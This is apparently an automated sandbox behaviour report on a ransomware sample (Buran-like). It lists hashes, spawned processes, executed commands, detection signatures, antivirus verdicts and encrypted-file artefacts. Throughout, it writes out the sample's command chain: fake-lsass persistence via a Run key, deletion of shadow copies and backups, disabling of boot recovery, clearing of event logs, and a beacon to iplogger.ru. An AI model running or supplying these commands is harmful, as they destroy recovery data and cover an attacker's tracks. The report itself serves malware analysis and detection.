· 6 years ago · Sep 19, 2019, 03:36 AM
1
2* ID: 2303
3* MalFamily: "Malicious"
4
5* MalScore: 10.0
6
7* File Name: "Exes_636d3c669e36510bf337fd2f1ea64732.tmp"
8* File Size: 435200
9* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
10* SHA256: "83157309528cd13e8d0cf8aa2202449cc454de56a2e9c689c75847e0f6b7f8f4"
11* MD5: "636d3c669e36510bf337fd2f1ea64732"
12* SHA1: "288fefa5d1a74d335d508b1b36453c70071c19b2"
13* SHA512: "a234bd046d8f4f8f73885570c7a5c582b46584f96a33178e70e0930c1dfbaa25ebe436e65002df338fccf6b6999c842947a6e6e8f108a738d50a6bd2ffd279a0"
14* CRC32: "D4F2AC3B"
15* SSDEEP: "6144:CSADzS90C6waTX9h+HkTokdKVx5n7MW2yBbbyMrkOK2qx7bys2T:CnrXb9daxZ7MW2yBbbvgHdx7b"
16
17* Process Execution:
18 "nH3pXIYjPPePo.exe",
19 "cmd.exe",
20 "reg.exe",
21 "lsass.exe",
22 "cmd.exe",
23 "cmd.exe",
24 "cmd.exe",
25 "cmd.exe",
26 "cmd.exe",
27 "cmd.exe",
28 "cmd.exe",
29 "WMIC.exe",
30 "cmd.exe",
31 "vssadmin.exe",
32 "cmd.exe",
33 "reg.exe",
34 "cmd.exe",
35 "reg.exe",
36 "cmd.exe",
37 "reg.exe",
38 "cmd.exe",
39 "attrib.exe",
40 "cmd.exe",
41 "cmd.exe",
42 "wevtutil.exe",
43 "cmd.exe",
44 "wevtutil.exe",
45 "cmd.exe",
46 "wevtutil.exe",
47 "cmd.exe",
48 "sc.exe",
49 "lsass.exe",
50 "lsass.exe",
51 "cmd.exe",
52 "PING.EXE",
53 "services.exe",
54 "svchost.exe",
55 "WmiPrvSE.exe",
56 "VSSVC.exe",
57 "taskhost.exe",
58 "WMIADAP.exe"
59
60
61* Executed Commands:
62 "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
63 "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start",
64 "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe -start",
65 "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )",
66 "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )",
67 "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
68 "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures",
69 "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no",
70 "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet",
71 "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup",
72 "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0",
73 "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup",
74 "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete",
75 "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet",
76 "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
77 "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
78 "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
79 "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h",
80 "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\"",
81 "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application",
82 "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security",
83 "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System",
84 "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled",
85 "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 0",
86 "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 1",
87 "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1",
88 "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete",
89 "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding",
90 "C:\\Windows\\system32\\vssvc.exe",
91 "vssadmin delete shadows /all /quiet",
92 "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
93 "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
94 "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
95 "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h",
96 "wevtutil.exe clear-log Application",
97 "wevtutil.exe clear-log Security",
98 "wevtutil.exe clear-log System",
99 "sc config eventlog start=disabled"
100
101
102* Signatures Detected:
103
104 "Description": "Behavioural detection: Executable code extraction",
105 "Details":
106
107
108 "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
109 "Details":
110
111
112 "Description": "Executed a command line with /C or /R argument to terminate command shell on completion which can be used to hide execution",
113 "Details":
114
115 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
116
117
118 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
119
120
121 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
122
123
124 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
125
126
127 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
128
129
130 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
131
132
133 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
134
135
136 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
137
138
139 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
140
141
142 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
143
144
145 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
146
147
148 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
149
150
151 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
152
153
154 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
155
156
157 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
158
159
160 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
161
162
163 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
164
165
166 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
167
168
169
170
171 "Description": "Creates RWX memory",
172 "Details":
173
174
175 "Description": "Possible date expiration check, exits too soon after checking local time",
176 "Details":
177
178 "process": "nH3pXIYjPPePo.exe, PID 2244"
179
180
181
182
183 "Description": "A process attempted to delay the analysis task.",
184 "Details":
185
186 "Process": "WmiPrvSE.exe tried to sleep 420 seconds, actually delayed analysis time by 0 seconds"
187
188
189
190
191 "Description": "Performs HTTP requests potentially not found in PCAP.",
192 "Details":
193
194 "url_ioc": "iplogger.ru:80/1Oh8E.jpeg"
195
196
197
198
199 "Description": "A process created a hidden window",
200 "Details":
201
202 "Process": "nH3pXIYjPPePo.exe -> C:\\Windows\\System32\\cmd.exe"
203
204
205
206
207 "Description": "Executed a command line with /V argument which modifies variable behaviour and whitespace allowing for increased obfuscation options",
208 "Details":
209
210 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
211
212
213
214
215 "Description": "Executed a very long command line or script command which may be indicative of chained commands or obfuscation",
216 "Details":
217
218 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
219
220
221
222
223 "Description": "Drops a binary and executes it",
224 "Details":
225
226 "binary": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
227
228
229
230
231 "Description": "A ping command was executed with the -n argument possibly to delay analysis",
232 "Details":
233
234 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
235
236
237 "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
238
239
240 "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
241
242
243
244
245 "Description": "Uses Windows utilities for basic functionality",
246 "Details":
247
248 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
249
250
251 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
252
253
254 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
255
256
257 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
258
259
260 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
261
262
263 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
264
265
266 "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
267
268
269 "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
270
271
272 "command": "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
273
274
275 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
276
277
278 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
279
280
281 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
282
283
284 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
285
286
287 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
288
289
290 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
291
292
293 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
294
295
296 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
297
298
299 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
300
301
302 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
303
304
305 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
306
307
308 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
309
310
311 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
312
313
314 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
315
316
317 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
318
319
320 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
321
322
323 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
324
325
326 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
327
328
329 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
330
331
332 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
333
334
335 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
336
337
338 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
339
340
341 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
342
343
344 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
345
346
347 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
348
349
350 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
351
352
353 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
354
355
356 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
357
358
359 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
360
361
362 "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
363
364
365 "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
366
367
368 "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
369
370
371 "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
372
373
374 "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
375
376
377 "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
378
379
380 "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
381
382
383 "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
384
385
386 "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
387
388
389 "command": "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h"
390
391
392 "command": "sc config eventlog start=disabled"
393
394
395
396
397 "Description": "Attempts to delete volume shadow copies",
398 "Details":
399
400
401 "Description": "Deletes its original binary from disk",
402 "Details":
403
404
405 "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
406 "Details":
407
408 "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 126917 times"
409
410
411
412
413 "Description": "Modifies boot configuration settings",
414 "Details":
415
416 "disables_system_recovery": "Modifies the boot configuration to disable startup recovery"
417
418
419 "ignorefailures": "Modifies the boot configuration to disable Windows error recovery"
420
421
422
423
424 "Description": "A system process is generating network traffic likely as a result of process injection",
425 "Details":
426
427 "http_request": "lsass.exe_InternetConnectA_iplogger.ru"
428
429
430 "http_request_path": "lsass.exe_HttpOpenRequestA_1Oh8E.jpeg"
431
432
433
434
435 "Description": "Installs itself for autorun at Windows startup",
436 "Details":
437
438 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service"
439
440
441 "data": "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start"
442
443
444
445
446 "Description": "Writes a potential ransom message to disk",
447 "Details":
448
449 "ransom_file": "!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT"
450
451
452
453
454 "Description": "File has been identified by 15 Antiviruses on VirusTotal as malicious",
455 "Details":
456
457 "Cylance": "Unsafe"
458
459
460 "CrowdStrike": "win/malicious_confidence_100% (D)"
461
462
463 "Symantec": "ML.Attribute.HighConfidence"
464
465
466 "APEX": "Malicious"
467
468
469 "Endgame": "malicious (high confidence)"
470
471
472 "Invincea": "heuristic"
473
474
475 "McAfee-GW-Edition": "BehavesLike.Win32.PWSQQPass.gh"
476
477
478 "FireEye": "Generic.mg.636d3c669e36510b"
479
480
481 "SentinelOne": "DFI - Malicious PE"
482
483
484 "Microsoft": "Trojan:Win32/Suloc.A"
485
486
487 "Acronis": "suspicious"
488
489
490 "VBA32": "Malware-Cryptor.General.3"
491
492
493 "Rising": "Trojan.Generic@ML.100 (RDML:kwEnH7CqjV0yUM4V3OzqNQ)"
494
495
496 "Cybereason": "malicious.5d1a74"
497
498
499 "Qihoo-360": "HEUR/QVM19.1.F7E7.Malware.Gen"
500
501
502
503
504 "Description": "Detects VirtualBox through the presence of a file",
505 "Details":
506
507 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat"
508
509
510 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf"
511
512
513 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf"
514
515
516 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat"
517
518
519 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf"
520
521
522 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat"
523
524
525
526
527 "Description": "Clears Windows events or logs",
528 "Details":
529
530 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
531
532
533 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
534
535
536 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
537
538
539 "command": "wevtutil.exe clear-log Application"
540
541
542 "command": "wevtutil.exe clear-log Security"
543
544
545 "command": "wevtutil.exe clear-log System"
546
547
548
549
550 "Description": "Appears to use character obfuscation in a command line",
551 "Details":
552
553 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
554
555
556
557
558 "Description": "Creates a copy of itself",
559 "Details":
560
561 "copy": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
562
563
564
565
566 "Description": "Anomalous binary characteristics",
567 "Details":
568
569 "anomaly": "Found duplicated section names"
570
571
572
573
574 "Description": "Uses suspicious command line tools or Windows utilities",
575 "Details":
576
577 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
578
579
580 "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
581
582
583 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
584
585
586 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
587
588
589 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
590
591
592 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
593
594
595 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
596
597
598 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
599
600
601 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
602
603
604 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
605
606
607 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
608
609
610 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
611
612
613 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
614
615
616 "command": "vssadmin delete shadows /all /quiet"
617
618
619 "command": "wevtutil.exe clear-log Application"
620
621
622 "command": "wevtutil.exe clear-log Security"
623
624
625 "command": "wevtutil.exe clear-log System"
626
627
628
629
630
631* Started Service:
632
633* Mutexes:
634 "Global\\ADAP_WMI_ENTRY",
635 "Global\\RefreshRA_Mutex",
636 "Global\\RefreshRA_Mutex_Lib",
637 "Global\\RefreshRA_Mutex_Flag"
638
639
640* Modified Files:
641 "C:\\Users\\user\\AppData\\Local\\Temp\\3C20D05E.buran",
642 "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe",
643 "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
644 "\\??\\PIPE\\wkssvc",
645 "\\Device\\LanmanDatagramReceiver",
646 "\\??\\PIPE\\DAV RPC SERVICE",
647 "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
648 "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
649 "\\??\\PIPE\\samr",
650 "C:\\.doc",
651 "C:\\.doc.3217EE46-3DA6-888C-CFD6-E175EC571166",
652 "C:\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
653 "C:\\.htm",
654 "C:\\.htm.3217EE46-3DA6-888C-CFD6-E175EC571166",
655 "C:\\.jpeg",
656 "C:\\.jpeg.3217EE46-3DA6-888C-CFD6-E175EC571166",
657 "C:\\.jpg",
658 "C:\\.jpg.3217EE46-3DA6-888C-CFD6-E175EC571166",
659 "C:\\.pptx",
660 "C:\\.pptx.3217EE46-3DA6-888C-CFD6-E175EC571166",
661 "C:\\.txt",
662 "C:\\.txt.3217EE46-3DA6-888C-CFD6-E175EC571166",
663 "C:\\.xls",
664 "C:\\.xls.3217EE46-3DA6-888C-CFD6-E175EC571166",
665 "C:\\.zip",
666 "C:\\2960.ini",
667 "C:\\Host.bmp",
668 "C:\\Host.bmp.3217EE46-3DA6-888C-CFD6-E175EC571166",
669 "C:\\Host.docx",
670 "C:\\Host.docx.3217EE46-3DA6-888C-CFD6-E175EC571166",
671 "C:\\Host.html",
672 "C:\\Host.html.3217EE46-3DA6-888C-CFD6-E175EC571166",
673 "C:\\Host.jpeg",
674 "C:\\Host.jpeg.3217EE46-3DA6-888C-CFD6-E175EC571166",
675 "C:\\Host.jpg",
